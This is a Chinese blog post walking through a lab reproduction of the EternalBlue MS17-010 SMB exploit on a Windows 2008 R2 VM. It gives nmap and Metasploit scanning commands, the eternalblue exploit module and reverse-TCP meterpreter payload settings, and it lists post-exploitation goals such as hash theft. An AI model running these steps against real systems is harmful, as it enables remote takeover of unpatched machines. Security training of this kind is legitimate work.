永恒之蓝 MS17-010漏洞复现

目录导航



一. 复现环境

工具:msf
攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24
测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243
网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模式


二. 漏洞原理
1.漏洞简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码
注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无

2.漏洞原理代码详解

想要从代码详细理解该漏洞的可以点击查看:

http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772
https://blog.csdn.net/qq_27446553/article/details/73480807



三. 漏洞复现

1.信息收集

- 确认网络情况
在这里插入图片描述
- 探测敏感端口

1. 使用nmap扫描(推荐)

nmap -p 445 -sV -Pn 169.254.93.24

在这里插入图片描述
可以看到这里扫描的结果显示目标主机开启了445端口;而永恒之蓝利用的就是445端口的smb服务也就是操作系统溢出漏洞

2.使用msf syn扫描模块

使用msf的扫描模块,通过search scanner可以查看大量的扫描模块,这里通过search portscan命令查看端口扫描器列表,输入use 模块名,即可使用该模块

msf5 exploit(windows/smb/ms17_010_eternalblue) > search scanner

在这里插入图片描述

msf5 exploit(windows/smb/ms17_010_eternalblue) > search portscan
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > show options 

在这里插入图片描述

这里说明一下参数的意义:
set rhosts 这个选项是设置要扫描的目标主机ip  如果设置本机则是lhosts
set ports  这个选项是设置要扫描目标主机的端口范围
set threads 这个选项是设置扫描是的线程 一般50足够了
show options 查看我们设置的参数情况

在这里插入图片描述
可以看到这里扫描的结果显示目标记器0-500的端口内开了80,135,445端口;而永恒之蓝利用的就是445端口中的smb服务作为攻击载体
在这里插入图片描述

2.漏洞探测

1.命令行输入 search ms17-010 查看关于永恒之蓝的漏洞模块
在这里插入图片描述
可以看到有auxiliary(辅助)模块和exploit(攻击)模块,而我们现在要使用的是模块二,用来进行对永恒之蓝的漏洞探测

msf5 auxiliary(scanner/portscan/syn) > use auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述
扫描结果显示该主机很容易受到ms17-010的攻击

3.漏洞利用

使用攻击模块:uexploit/windows/smb/ms17_010_eternalblue 进行攻击
选择攻击模块时要根据不同版本的操作系统来选择合适的攻击模块

set payload :设置payload,这里用set payload windows/x64/meterpreter/reverse_tcp
要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload
show options :使用该命令会列出使用当前模块所需呀配置的参数
set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444

在这里插入图片描述
所有条件设置好后 输入run:开始攻击
攻击成功后攻击机和目标主机之间会建立一个连接,得到一个meterpreter会话
在这里插入图片描述
到这里漏洞攻击已经成功,接下来要做的就是后渗透攻击,涉及到权限提升,跳板攻击,密码哈希值获取,获取shell以及其他更多信息

发布了36 篇原创文章 · 获赞 60 · 访问量 9957

猜你喜欢

转载自blog.csdn.net/chest_/article/details/103645671
今日推荐